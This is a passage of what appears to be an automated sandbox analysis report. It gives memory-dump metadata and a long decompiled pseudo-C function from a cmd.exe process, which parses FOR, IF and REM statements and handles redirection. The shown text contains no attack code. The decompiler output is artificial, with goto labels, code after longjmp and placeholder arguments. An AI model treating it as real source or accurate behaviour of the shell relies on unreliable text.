                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,0120B980,00002000,?), ref: 011DC777
                                    • _ultoa.MSVCRT ref: 011EAF0E
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EAF17
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 011EAF38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                    • String ID: Application$System
                                    • API String ID: 3538039442-3455788185
                                    • Opcode ID: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                    • Instruction ID: 05dde94352ced63d082aad38fd2d9c5ee93768cc0259d28a3f910b6ea27cf815
                                    • Opcode Fuzzy Hash: e2487abe77ab89d349b284bd426415fbd0543afd3c5013dd0217b18ad43fc1a1
                                    • Instruction Fuzzy Hash: FF41E771B007196BDF289BA4DC5DFAEBBA8EB55711F110119F606EB1C0DB709D40CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 55%
                                    			E011E04A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
                                    				signed int _v4;
                                    				WCHAR* _v8;
                                    				long* _v12;
                                    				long _v16;
                                    				WCHAR* _v20;
                                    				WCHAR* _v24;
                                    				char _v544;
                                    				WCHAR* _v548;
                                    				WCHAR* _v552;
                                    				WCHAR* __esi;
                                    				signed int _t106;
                                    				short _t107;
                                    				void* _t112;
                                    				signed int _t115;
                                    				void* _t117;
                                    				WCHAR** _t119;
                                    				short _t120;
                                    				signed int _t124;
                                    				signed short* _t125;
                                    				WCHAR* _t129;
                                    
                                    				_t117 = __ebx;
                                    				_t106 = __eax;
                                    				if( *0x120fa90 != 0x4000) {
                                    					_t107 =  *0x120faa0;
                                    					__eflags = _t107 - 0x28;
                                    					if(_t107 != 0x28) {
                                    						__eflags = _t107 - 0x40;
                                    						if(_t107 == 0x40) {
                                    							goto L140;
                                    						} else {
                                    							goto L150;
                                    						}
                                    					} else {
                                    						L140:
                                    						_t119 = 0x50;
                                    						_t129 = E011E00B0(0x50);
                                    						__eflags = _t129;
                                    						if(_t129 == 0) {
                                    							E011F9287(0x50);
                                    							__imp__longjmp(0x120b8b8, 1);
                                    							asm("int3");
                                    							_t106 =  *0x50 & 0x0000ffff;
                                    							_t124 = _t106;
                                    							__eflags = _t106;
                                    							if(_t106 != 0) {
                                    								_t106 = 0;
                                    								__eflags = 0;
                                    								do {
                                    									_t125 = _t119;
                                    									_t119 = _t119 + _t129;
                                    									__eflags =  *_t119;
                                    								} while ( *_t119 != 0);
                                    								_t124 =  *_t125 & 0x0000ffff;
                                    							}
                                    							__eflags = _t124 - 0x3a;
                                    							if(_t124 != 0x3a) {
                                    								 *0x11fd55c = 3;
                                    							}
                                    							return _t106;
                                    						} else {
                                    							__eflags =  *0x120faa0 - 0x28;
                                    							if( *0x120faa0 != 0x28) {
                                    								 *_t129 = 0x3b;
                                    								_t120 = 0;
                                    							} else {
                                    								 *_t129 = 0x33;
                                    								do {
                                    									_t115 = E011DF030(0x10);
                                    									__eflags =  *0x120faa0 - 0xa;
                                    								} while ( *0x120faa0 == 0xa);
                                    								__eflags = 0;
                                    								E011DF300(_t115, 0, 0, 0);
                                    								_t120 = 0x33;
                                    							}
                                    							_t129[0x1c] = E011DDC74(_t117, _t120);
                                    							__eflags =  *_t129 - 0x3b;
                                    							if( *_t129 == 0x3b) {
                                    								L147:
                                    								return _t129;
                                    							} else {
                                    								_t112 = E011DF030(0x10);
                                    								__eflags = _t112 - 0x29;
                                    								if(_t112 != 0x29) {
                                    									L150:
                                    									E011F82EB(0x10);
                                    									__eflags = 0;
                                    									return 0;
                                    								} else {
                                    									goto L147;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					__imp___wcsicmp(L"FOR", 0x120faa0);
                                    					__esp = __esp + 8;
                                    					__eflags = __eax;
                                    					if(__eax == 0) {
                                    						L152:
                                    						_pop(__esi);
                                    						__edi = 0;
                                    						__imp___wcsicmp(L"FOR/?", __edi, __esi);
                                    						_pop(__ecx);
                                    						__ecx = 0x120faa0;
                                    						__eflags = __eax;
                                    						if(__eflags == 0) {
                                    							__eax = 0;
                                    							__edi = 0;
                                    							 *0x120faa6 = __ax;
                                    							__edi = 1;
                                    						}
                                    						__ecx = 0x2b;
                                    						 *0x120fa8c = 0x1e;
                                    						__esi = E011DE9A0(__ecx, __eflags);
                                    						__eax = 0x2f;
                                    						__eflags = __edi;
                                    						if(__edi != 0) {
                                    							 *0x120faa0 = __ax;
                                    							__eax = 0x3f;
                                    							 *0x120faa2 = __ax;
                                    							__eax = 0;
                                    							 *0x120faa4 = __ax;
                                    						} else {
                                    							__ecx = 0;
                                    							__eflags = 0;
                                    							__eax = E011DF030(0);
                                    						}
                                    						__edx = 0x2b;
                                    						__eax = E011DDCE1(__ebx, __edx, __edi);
                                    						__eflags = __al;
                                    						if(__al != 0) {
                                    							__esi[0x1c] = __esi[0x1c] & 0x00000000;
                                    							 *__esi = 0x3c;
                                    						} else {
                                    							__esi[0x24] = __esi[0x24] & 0x00000000;
                                    							__eflags =  *0x1213cc9;
                                    							__eax = 0x25;
                                    							if( *0x1213cc9 != 0) {
                                    								__edi = 0;
                                    								__edi = 1;
                                    								__eflags = 1;
                                    								while(1) {
                                    									__imp___wcsicmp(L"/L");
                                    									_pop(__ecx);
                                    									__ecx = 0x120faa0;
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										goto L32;
                                    									}
                                    									L9:
                                    									__imp___wcsicmp(L"/D");
                                    									_pop(__ecx);
                                    									__ecx = 0x120faa0;
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										__esi[0x24] = __esi[0x24] | 0x00000002;
                                    										L27:
                                    										__ecx = 0;
                                    										__eax = E011DF030(0);
                                    										while(1) {
                                    											__imp___wcsicmp(L"/L");
                                    											_pop(__ecx);
                                    											__ecx = 0x120faa0;
                                    											__eflags = __eax;
                                    											if(__eax == 0) {
                                    												goto L32;
                                    											}
                                    											goto L9;
                                    										}
                                    										goto L32;
                                    									}
                                    									__imp___wcsicmp(L"/F");
                                    									_pop(__ecx);
                                    									__ecx = 0x120faa0;
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										__esi[0x24] = __esi[0x24] | 0x00000008;
                                    										__ecx = 0;
                                    										__eax = E011DF030(0);
                                    										__ax =  *0x120faa0;
                                    										__ecx = 0x25;
                                    										__eflags = __ax - __cx;
                                    										if(__ax == __cx) {
                                    											continue;
                                    										} else {
                                    											__ecx = 0x2f;
                                    											__eflags = __ax - __cx;
                                    											if(__ax == __cx) {
                                    												continue;
                                    											} else {
                                    												__eflags = __esi[0x26];
                                    												if(__esi[0x26] != 0) {
                                    													__eax = E011F82EB(__ecx);
                                    												}
                                    												__eax =  *0x120fa8c;
                                    												__ecx = 6 +  *0x120fa8c * 2;
                                    												__eax = E011E00B0(__ecx);
                                    												__eflags = __eax;
                                    												if(__eax == 0) {
                                    													goto L212;
                                    												} else {
                                    													__edx =  *0x120fa8c;
                                    													__edx =  &(( *0x120fa8c)[1]);
                                    													goto L26;
                                    												}
                                    											}
                                    										}
                                    										goto L218;
                                    									} else {
                                    										__imp___wcsicmp(L"/R");
                                    										_pop(__ecx);
                                    										__ecx = 0x120faa0;
                                    										__ecx = __esi[0x24];
                                    										__eflags = __eax;
                                    										if(__eax == 0) {
                                    											__esi[0x24] = __ecx;
                                    											__ecx = 0;
                                    											__eax = E011DF030(0);
                                    											__eflags = __esi[0x26];
                                    											if(__esi[0x26] != 0) {
                                    												__eax = E011F82EB(__ecx);
                                    											}
                                    											__ax =  *0x120faa0;
                                    											__ecx = 0x25;
                                    											__eflags = __ax - __cx;
                                    											if(__ax == __cx) {
                                    												continue;
                                    											} else {
                                    												__ecx = 0x2f;
                                    												__eflags = __ax - __cx;
                                    												if(__ax == __cx) {
                                    													continue;
                                    												} else {
                                    													__eax =  *0x120fa8c;
                                    													__ecx = 2 +  *0x120fa8c * 2;
                                    													__eax = E011E00B0(__ecx);
                                    													__eflags = __eax;
                                    													if(__eax == 0) {
                                    														L212:
                                    														__eax = E011F9287(__ecx);
                                    														__imp__longjmp(0x120b8b8, __edi);
                                    														goto L213;
                                    													} else {
                                    														__edx =  *0x120fa8c;
                                    														__edx =  &(( *0x120fa8c)[0]);
                                    														L26:
                                    														__ecx = __eax;
                                    														__esi[0x26] = __eax;
                                    														__eax = E011E1040(__eax, __edx, 0x120faa0);
                                    														goto L27;
                                    													}
                                    												}
                                    											}
                                    											goto L218;
                                    										} else {
                                    											__eflags = __ecx;
                                    											if(__ecx != 0) {
                                    												__eflags = __ecx - 8;
                                    												if(__ecx != 8) {
                                    													__eflags = __ecx - 2;
                                    													if(__ecx != 2) {
                                    														__eflags = __ecx - __edi;
                                    														if(__ecx != __edi) {
                                    															L213:
                                    															__eflags = __ecx - 6;
                                    															if(__ecx != 6) {
                                    																__eflags = __ecx - 4;
                                    																if(__ecx != 4) {
                                    																	__eax = E011F82EB(__ecx);
                                    																}
                                    															}
                                    														}
                                    													}
                                    												}
                                    											}
                                    										}
                                    									}
                                    									__eax = 0x25;
                                    									goto L15;
                                    									L32:
                                    									__esi[0x24] = __esi[0x24] | __edi;
                                    									goto L27;
                                    								}
                                    							}
                                    							L15:
                                    							__eflags =  *0x120faa0 - __ax;
                                    							if( *0x120faa0 != __ax) {
                                    								L216:
                                    								__eax = E011F82EB(__ecx);
                                    							} else {
                                    								__eax =  *0x120faa2 & 0x0000ffff;
                                    								__eax = iswspace( *0x120faa2 & 0x0000ffff);
                                    								_pop(__ecx);
                                    								__eflags = __eax;
                                    								if(__eax != 0) {
                                    									goto L216;
                                    								} else {
                                    									__edx =  *0x120faa2 & 0x0000ffff;
                                    									__ecx = L"=,;";
                                    									__esi[0x22] = __edx;
                                    									__eax = E011DD7D4(__ecx, __edx);
                                    									__eflags = __eax;
                                    									if(__eax != 0) {
                                    										goto L216;
                                    									} else {
                                    										__eflags =  *0x120fa8c - 3;
                                    										if( *0x120fa8c != 3) {
                                    											goto L216;
                                    										}
                                    									}
                                    								}
                                    							}
                                    							__ecx = __esi[0x1c];
                                    							__edi = 0x120faa0;
                                    							_push(0x120faa0);
                                    							_push(__ecx);
                                    							__edx = 0x1e;
                                    							__eax = E011D9C73(__ecx, __edx);
                                    							__ecx = L"IN";
                                    							__eax = E011D9C4D(L"IN");
                                    							__ecx = __esi[0x1c];
                                    							_push(0x120faa0);
                                    							_push(__ecx);
                                    							__edx = 0x1e;
                                    							__eax = E011D9C73(__ecx, __edx);
                                    							__eax = E011D9936(__ebx);
                                    							__ecx = L"DO";
                                    							__esi[0x1e] = __eax;
                                    							__eax = E011D9C4D(L"DO");
                                    							__ecx = __esi[0x1c];
                                    							_push(0x120faa0);
                                    							__ecx = __esi[0x1c] + 0x2c;
                                    							__edx = 8;
                                    							__eax = E011E1040(__esi[0x1c] + 0x2c, __edx);
                                    							__ecx = 0x2b;
                                    							__eax = E011DDC74(__ebx, __ecx);
                                    							__esi[0x20] = __eax;
                                    							__eflags = __eax;
                                    							if(__eax == 0) {
                                    								__eax = E011F82EB(__ecx);
                                    							}
                                    						}
                                    						_pop(__edi);
                                    						__eax = __esi;
                                    						_pop(__esi);
                                    						return __esi;
                                    					} else {
                                    						__imp___wcsicmp(L"FOR/?", 0x120faa0);
                                    						__esp = __esp + 8;
                                    						__eflags = __eax;
                                    						if(__eax == 0) {
                                    							goto L152;
                                    						} else {
                                    							__imp___wcsicmp(L"IF", 0x120faa0);
                                    							__esp = __esp + 8;
                                    							__eflags = __eax;
                                    							if(__eax == 0) {
                                    								L148:
                                    								_pop(__esi);
                                    								__edi = 0;
                                    								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
                                    								_pop(__ecx);
                                    								__ecx = 0x120faa0;
                                    								__eflags = __eax;
                                    								if(__eflags == 0) {
                                    									__eax = 0;
                                    									__edi = 0;
                                    									 *0x120faa4 = __ax;
                                    									__edi = 1;
                                    								}
                                    								__ecx = 0x2c;
                                    								__esi = E011DE9A0(__ecx, __eflags);
                                    								__eflags = __edi;
                                    								if(__edi != 0) {
                                    									__eax = 0x2f;
                                    									 *0x120faa0 = __ax;
                                    									__eax = 0x3f;
                                    									 *0x120faa2 = __ax;
                                    									__eax = 0;
                                    									 *0x120faa4 = __ax;
                                    								} else {
                                    									__ecx = 0;
                                    									__eflags = 0;
                                    									__eax = E011DF030(0);
                                    								}
                                    								__edx = 0x2c;
                                    								__eax = E011DDCE1(__ebx, __edx, __edi);
                                    								__eflags = __al;
                                    								if(__al != 0) {
                                    									__esi[0x1c] = __esi[0x1c] & 0x00000000;
                                    									 *__esi = 0x3c;
                                    									goto L47;
                                    								} else {
                                    									__edi = 0;
                                    									__eflags =  *0x1213cc9 - __al;
                                    									if( *0x1213cc9 == __al) {
                                    										L40:
                                    										__edx = 0;
                                    										__ecx = 0;
                                    										__eflags = 0;
                                    										__eax = E011DF300(__eax, 0, 0, 0);
                                    									} else {
                                    										__imp___wcsicmp(L"/I");
                                    										__ecx = 0x120faa0;
                                    										_pop(__ecx);
                                    										__eflags = __eax;
                                    										if(__eax == 0) {
                                    											__edi = 0;
                                    											__edi = 1;
                                    										} else {
                                    											goto L40;
                                    										}
                                    									}
                                    									__ecx = 0;
                                    									__eax = E011DCDA2(0);
                                    									__esi[0x1e] = __eax;
                                    									__eflags = __eax;
                                    									if(__eax != 0) {
                                    										__eflags = __edi;
                                    										if(__edi != 0) {
                                    											__eflags =  *__eax - 0x38;
                                    											if( *__eax == 0x38) {
                                    												__eax = __eax[0x1e];
                                    											}
                                    											__eax[0x20] = 2;
                                    										}
                                    									}
                                    									__ecx = 0x2c;
                                    									__eax = E011DDC74(__ebx, __ecx);
                                    									__esi[0x20] = __eax;
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										__eax = E011F82EB(__ecx);
                                    									}
                                    									__eax = E011DEEC8();
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										L47:
                                    										_pop(__edi);
                                    										__eax = __esi;
                                    										_pop(__esi);
                                    										_pop(__ecx);
                                    										return __esi;
                                    									} else {
                                    										__ecx = 0;
                                    										__eax = E011DF030(0);
                                    										__edi = 0x120faa0;
                                    										__imp___wcsicmp(L"ELSE");
                                    										_pop(__ecx);
                                    										__ecx = 0x120faa0;
                                    										__eflags = __eax;
                                    										if(__eax == 0) {
                                    											__eax =  *0x120fa8c;
                                    											__ecx =  *0x120fa8c +  *0x120fa8c;
                                    											__eax = E011E00B0(__ecx);
                                    											__eflags = __eax;
                                    											if(__eax == 0) {
                                    												__eax = E011F9287(__ecx);
                                    												__imp__longjmp(0x120b8b8, 1);
                                    												asm("int3");
                                    												while(1) {
                                    													L165:
                                    													__eax = 0;
                                    													__edx[__ecx] = __ax;
                                    													while(1) {
                                    														__eax = __esi[0xa];
                                    														__esi = __eax;
                                    														__eflags = __eax;
                                    														if(__eax == 0) {
                                    															break;
                                    														}
                                    														__ecx = __esi[2];
                                    														__edi = __ecx;
                                    														__edx =  &(__edi[1]);
                                    														do {
                                    															__ax =  *__edi;
                                    															__edi =  &(__edi[1]);
                                    															__eflags = __ax - __bx;
                                    														} while (__ax != __bx);
                                    														__edi = __edi - __edx;
                                    														__edi = __edi >> 1;
                                    														__eax = E011E22C0(__ebx, __ecx);
                                    														__ecx = __esi[2];
                                    														__edx =  &(__edi[0]);
                                    														__eax = E011E1040(__esi[2], __edx, __eax);
                                    														__eflags = __esi[4] - __ebx;
                                    														if(__esi[4] == __ebx) {
                                    															__edx = __esi[2];
                                    															__ecx = __edx;
                                    															__edi =  &(__ecx[1]);
                                    															do {
                                    																__ax =  *__ecx;
                                    																__ecx =  &(__ecx[1]);
                                    																__eflags = __ax - __bx;
                                    															} while (__ax != __bx);
                                    															__ecx = __ecx - __edi;
                                    															__ecx = __ecx >> 1;
                                    															__ecx = __ecx - 1;
                                    															__eflags = __ecx - 1;
                                    															if(__ecx > 1) {
                                    																__eflags = __edx[__ecx] - 0x3a;
                                    																if(__edx[__ecx] == 0x3a) {
                                    																	goto L165;
                                    																}
                                    															}
                                    														}
                                    													}
                                    													__edi = _v552;
                                    													__esi = _v548;
                                    													__eflags = __esi - 3;
                                    													if(__esi == 3) {
                                    														__eax =  *0x1213cd4;
                                    														_v552 = __eax;
                                    														goto L67;
                                    													} else {
                                    														__ecx = 0x10;
                                    														__eax = E011E00B0(__ecx);
                                    														_v552 = __eax;
                                    														__eflags = __eax;
                                    														if(__eax == 0) {
                                    															L86:
                                    															__ebx = 0;
                                    															__ebx = 1;
                                    														} else {
                                    															__ecx =  *0x1213cd4;
                                    															__eax[6] =  *0x1213cd4;
                                    															 *0x1213cd4 = __eax;
                                    															__eax[4] = __edi;
                                    															 *__eax = __esi;
                                    															L67:
                                    															__edi = __edi[0x1a];
                                    															__eflags = __edi;
                                    															if(__edi != 0) {
                                    																__esi = __esi | 0xffffffff;
                                    																__eflags = __esi;
                                    																do {
                                    																	__eflags = __edi[4] - __ebx;
                                    																	if(__edi[4] != __ebx) {
                                    																		goto L82;
                                    																	} else {
                                    																		__imp___get_osfhandle( *__edi);
                                    																		_pop(__ecx);
                                    																		__eflags = __eax - __esi;
                                    																		if(__eax == __esi) {
                                    																			L170:
                                    																			__edi[4] = __esi;
                                    																			goto L75;
                                    																		} else {
                                    																			__imp___get_osfhandle( *__edi);
                                    																			_pop(__ecx);
                                    																			__eflags = __eax - 0xfffffffe;
                                    																			if(__eax == 0xfffffffe) {
                                    																				goto L170;
                                    																			} else {
                                    																				__ecx =  *__edi;
                                    																				__eax = E011E0178(__eax);
                                    																				__eflags = __eax;
                                    																				if(__eax == 0) {
                                    																					__ecx =  *__edi;
                                    																					__eax = E011F9953(__eax,  *__edi);
                                    																					__eflags = __eax;
                                    																					if(__eax != 0) {
                                    																						goto L73;
                                    																					} else {
                                    																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
                                    																						_pop(__ecx);
                                    																						__eax = SetFilePointer(__eax, ??, ??, ??);
                                    																						__eflags = __eax - __esi;
                                    																						if(__eax != __esi) {
                                    																							goto L73;
                                    																						} else {
                                    																							__esi = 0x1213d00;
                                    																							__eax = E011E274C(0x1213d00, 0x104, L"%d",  *__edi);
                                    																							_push(0x1213d00);
                                    																							_push(1);
                                    																							_push(0x40002721);
                                    																							goto L182;
                                    																						}
                                    																					}
                                    																				} else {
                                    																					L73:
                                    																					__ecx =  *__edi;
                                    																					__eax = E011DDBCE(__eax,  *__edi);
                                    																					__edi[4] = __eax;
                                    																					__eflags = __eax - __esi;
                                    																					if(__eax == __esi) {
                                    																						__esi = 0x1213d00;
                                    																						__eax = E011E274C(0x1213d00, 0x104, L"%d",  *__edi);
                                    																						_push(0x1213d00);
                                    																						_push(1);
                                    																						_push(0x2344);
                                    																						L182:
                                    																						__eax = E011DC5A2(__ecx);
                                    																						__esp = __esp + 0x1c;
                                    																						__edi[4] = __ebx;
                                    																						__eax = E011DD937();
                                    																						goto L86;
                                    																					} else {
                                    																						__ecx =  *__edi;
                                    																						__eax = E011DDB92( *__edi);
                                    																						L75:
                                    																						__ecx = __edi[2];
                                    																						__eflags =  *__ecx - 0x26;
                                    																						if( *__ecx == 0x26) {
                                    																							__eax = 0;
                                    																							__ecx[2] = __ax;
                                    																							__eax = __edi[2];
                                    																							__edx =  *__edi;
                                    																							__ecx = __eax[1] & 0x0000ffff;
                                    																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
                                    																							__eax = E011DDBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
                                    																							__eflags = __eax - __esi;
                                    																							if(__eax != __esi) {
                                    																								goto L82;
                                    																							} else {
                                    																								goto L183;
                                    																							}
                                    																						} else {
                                    																							__eflags = __edi[8] - 0x3c;
                                    																							_push(__ecx);
                                    																							if(__edi[8] == 0x3c) {
                                    																								__edx = 0x8000;
                                    																								__eax = E011DD120(__ecx, 0x8000);
                                    																								_v548 = __eax;
                                    																								__eflags = __eax - __esi;
                                    																								if(__eax != __esi) {
                                    																									goto L79;
                                    																								} else {
                                    																									__ecx = L"DPATH";
                                    																									__eax = E011E3320(L"DPATH");
                                    																									__eflags = __eax;
                                    																									if(__eax == 0) {
                                    																										goto L184;
                                    																									} else {
                                    																										__ecx = _v24;
                                    																										__eflags = __ecx;
                                    																										if(__ecx == 0) {
                                    																											__ecx =  &_v544;
                                    																										}
                                    																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
                                    																										__eflags = __eax;
                                    																										if(__eax == 0) {
                                    																											goto L184;
                                    																										} else {
                                    																											__ecx = _v24;
                                    																											__eflags = __ecx;
                                    																											if(__ecx == 0) {
                                    																												__ecx =  &_v544;
                                    																											}
                                    																											_push(__ecx);
                                    																											__edx = 0x8000;
                                    																											goto L78;
                                    																										}
                                    																									}
                                    																								}
                                    																							} else {
                                    																								__edi[6] =  ~(__edi[6]);
                                    																								asm("sbb edx, edx");
                                    																								__edx =  ~(__edi[6]) & 0xfffffe09;
                                    																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
                                    																								__eflags = __edx;
                                    																								L78:
                                    																								__eax = E011DD120(__ecx, __edx);
                                    																								_v548 = __eax;
                                    																								__eflags = __eax - __esi;
                                    																								if(__eax == __esi) {
                                    																									L184:
                                    																									__eax = E011DD937();
                                    																									__ecx =  *0x1213cf0;
                                    																									__eax = E011F985A( *0x1213cf0);
                                    																									goto L86;
                                    																								} else {
                                    																									L79:
                                    																									__eflags = __eax -  *__edi;
                                    																									if(__eax !=  *__edi) {
                                    																										__edx =  *__edi;
                                    																										__ecx = __eax;
                                    																										__eax = E011DDBFC(__eax,  *__edi);
                                    																										__ecx = _v548;
                                    																										__esi = __eax;
                                    																										__eax = E011DDB92(_v548);
                                    																										__eflags = __esi - 0xffffffff;
                                    																										if(__esi == 0xffffffff) {
                                    																											L183:
                                    																											__eax = E011DD937();
                                    																											__esi = 0x1213d00;
                                    																											E011E274C(0x1213d00, 0x104, L"%d",  *__edi) = E011DC5A2(__ecx, 0x2344, 1, 0x1213d00);
                                    																											goto L86;
                                    																										} else {
                                    																											__eax =  *__edi;
                                    																											__esi = __esi | 0xffffffff;
                                    																											goto L80;
                                    																										}
                                    																									} else {
                                    																										L80:
                                    																										__eflags = __eax - __esi;
                                    																										if(__eax == __esi) {
                                    																											goto L184;
                                    																										} else {
                                    																											__ecx = _v552;
                                    																											_v552[2] = __eax;
                                    																											goto L82;
                                    																										}
                                    																									}
                                    																								}
                                    																							}
                                    																						}
                                    																					}
                                    																				}
                                    																			}
                                    																		}
                                    																	}
                                    																	goto L83;
                                    																	L82:
                                    																	__eax = __edi[0xa];
                                    																	__edi = __eax;
                                    																	__eflags = __eax;
                                    																} while (__eax != 0);
                                    															}
                                    														}
                                    													}
                                    													L83:
                                    													__imp__??_V@YAXPAX@Z(_v24);
                                    													_pop(__ecx);
                                    													__ecx = _v4;
                                    													__eax = __ebx;
                                    													_pop(__edi);
                                    													_pop(__esi);
                                    													__ecx = _v4 ^ __ebp;
                                    													__eflags = __ecx;
                                    													_pop(__ebx);
                                    													__eax = E011E6FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
                                    													__esp = __ebp;
                                    													_pop(__ebp);
                                    													return __eax;
                                    													goto L218;
                                    												}
                                    											} else {
                                    												__edx =  *0x120fa8c;
                                    												__ecx = __eax;
                                    												__esi[0x22] = __eax;
                                    												__eax = E011E1040(__eax,  *0x120fa8c, 0x120faa0);
                                    												__ecx = 0x2c;
                                    												__eax = E011DDC74(__ebx, __ecx);
                                    												__esi[0x24] = __eax;
                                    												__eflags = __eax;
                                    												if(__eax == 0) {
                                    													__eax = E011F82EB(__ecx);
                                    												}
                                    												goto L47;
                                    											}
                                    										} else {
                                    											__edx = 0;
                                    											__ecx = 0;
                                    											__eflags = 0;
                                    											__eax = E011DF300(__eax, 0, 0, 0);
                                    											goto L47;
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								__imp___wcsicmp(L"IF/?", 0x120faa0);
                                    								__esp = __esp + 8;
                                    								__eflags = __eax;
                                    								if(__eax == 0) {
                                    									goto L148;
                                    								} else {
                                    									__imp___wcsicmp(L"REM", 0x120faa0);
                                    									__esp = __esp + 8;
                                    									__eflags = __eax;
                                    									if(__eax == 0) {
                                    										L138:
                                    										_pop(__esi);
                                    										__edi = 0;
                                    										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
                                    										_pop(__ecx);
                                    										__ecx = 0x120faa0;
                                    										__eflags = __eax;
                                    										if(__eflags == 0) {
                                    											__eax = 0;
                                    											__edi = 0;
                                    											 *0x120faa6 = __ax;
                                    											__edi = 1;
                                    										}
                                    										__ecx = 0x2d;
                                    										__esi = E011DE9A0(__ecx, __eflags);
                                    										__eflags = __edi;
                                    										if(__edi != 0) {
                                    											__eax = 0x2f;
                                    											 *0x120faa0 = __ax;
                                    											__eax = 0x3f;
                                    											 *0x120faa2 = __ax;
                                    											__eax = 0;
                                    											 *0x120faa4 = __ax;
                                    										} else {
                                    											__ecx = 0;
                                    											__eflags = 0;
                                    											__eax = E011DF030(0);
                                    										}
                                    										__edx = 0x2d;
                                    										__eax = E011DDCE1(__ebx, __edx, __edi);
                                    										__eflags = __al;
                                    										if(__al != 0) {
                                    											__esi[0x1c] = __esi[0x1c] & 0x00000000;
                                    											 *__esi = 0x3c;
                                    											goto L95;
                                    										} else {
                                    											__edx = 0;
                                    											__ecx = 0;
                                    											__eax = E011DF300(__eax, 0, 0, 0);
                                    											__eax = E011DEEC8();
                                    											__eflags = __eax;
                                    											if(__eax == 0) {
                                    												L95:
                                    												_pop(__edi);
                                    												__eax = __esi;
                                    												_pop(__esi);
                                    												_pop(__ecx);
                                    												return __esi;
                                    											} else {
                                    												__ecx = 0x20;
                                    												__eax = E011DF030(__ecx);
                                    												__eflags = __eax - 0x4000;
                                    												if(__eax != 0x4000) {
                                    													__edx = 0;
                                    													__ecx = 0;
                                    													__eax = E011DF300(__eax, 0, 0, 0);
                                    													goto L95;
                                    												} else {
                                    													__eax =  *0x120fa8c;
                                    													__ecx =  *0x120fa8c +  *0x120fa8c;
                                    													__eax = E011E00B0(__ecx);
                                    													__eflags = __eax;
                                    													if(__eax == 0) {
                                    														__eax = E011F9287(__ecx);
                                    														__imp__longjmp(0x120b8b8, 1);
                                    														asm("int3");
                                    														__eflags = __esi;
                                    														if(__esi != 0) {
                                    															__eax = 0;
                                    															 *__ebx = __ax;
                                    														}
                                    														_pop(__edi);
                                    														_pop(__esi);
                                    														__eax = __ebx;
                                    														_pop(__ebx);
                                    														return __ebx;
                                    													} else {
                                    														__edx =  *0x120fa8c;
                                    														__ecx = __eax;
                                    														__esi[0x1e] = __eax;
                                    														__eax = E011E1040(__eax,  *0x120fa8c, 0x120faa0);
                                    														goto L95;
                                    													}
                                    												}
                                    											}
                                    										}
                                    									} else {
                                    										__imp___wcsicmp(L"REM/?", 0x120faa0);
                                    										__esp = __esp + 8;
                                    										__eflags = __eax;
                                    										if(__eax == 0) {
                                    											goto L138;
                                    										} else {
                                    											_pop(__esi);
                                    											_push(__ebp);
                                    											__ebp = __esp;
                                    											__esp = __esp - 0x14;
                                    											_push(__ebx);
                                    											_push(__esi);
                                    											__eax =  &_v16;
                                    											_v16 = 0;
                                    											_push(__edi);
                                    											__ecx = 0;
                                    											__eflags = 0;
                                    											_v12 =  &_v16;
                                    											__ebx = E011DE9A0(0, 0);
                                    											_v20 = __ebx;
                                    											while(1) {
                                    												__eax = E011DEEC8();
                                    												__eflags = __eax;
                                    												if(__eax == 0) {
                                    													break;
                                    												}
                                    												__ecx = 1;
                                    												__eax = E011DF030(1);
                                    												__eflags = __eax - 0x4000;
                                    												if(__eax == 0x4000) {
                                    													__ecx = __ebx[0x1e];
                                    													__edi =  *0x120fa8c;
                                    													__eflags = __ecx;
                                    													if(__ecx != 0) {
                                    														__edx =  &(__ecx[1]);
                                    														do {
                                    															__ax =  *__ecx;
                                    															__ecx =  &(__ecx[1]);
                                    															__eflags = __ax;
                                    														} while (__ax != 0);
                                    														__ecx = __ecx - __edx;
                                    														__edi = __edi + __ecx;
                                    													}
                                    													__ecx = __edi + __edi;
                                    													__esi = E011E00B0(__ecx);
                                    													_v8 = __esi;
                                    													__eflags = __esi;
                                    													if(__esi == 0) {
                                    														__eax = E011F9287(__ecx);
                                    														__imp__longjmp(0x120b8b8, 1);
                                    														asm("int3");
                                    														__eflags =  *0x120fa90;
                                    														if( *0x120fa90 != 0) {
                                    															__eax = E011F82EB(__ecx);
                                    														}
                                    														__eax = 0;
                                    														__eflags = 0;
                                    														__eflags =  *0x120fa88;
                                    														 *0x11fd5c8 = 0;
                                    														if( *0x120fa88 != 0) {
                                    															__edx = 0;
                                    															__ecx = __esi;
                                    															__eax = E011F8121(__esi, 0);
                                    														}
                                    														__eax = __esi;
                                    														_pop(__edi);
                                    														_pop(__esi);
                                    														_pop(__ebx);
                                    														_pop(__ebp);
                                    														return __eax;
                                    													} else {
                                    														__ecx = __ebx[0x1e];
                                    														__eflags = __ecx;
                                    														if(__ecx != 0) {
                                    															__edx = __edi;
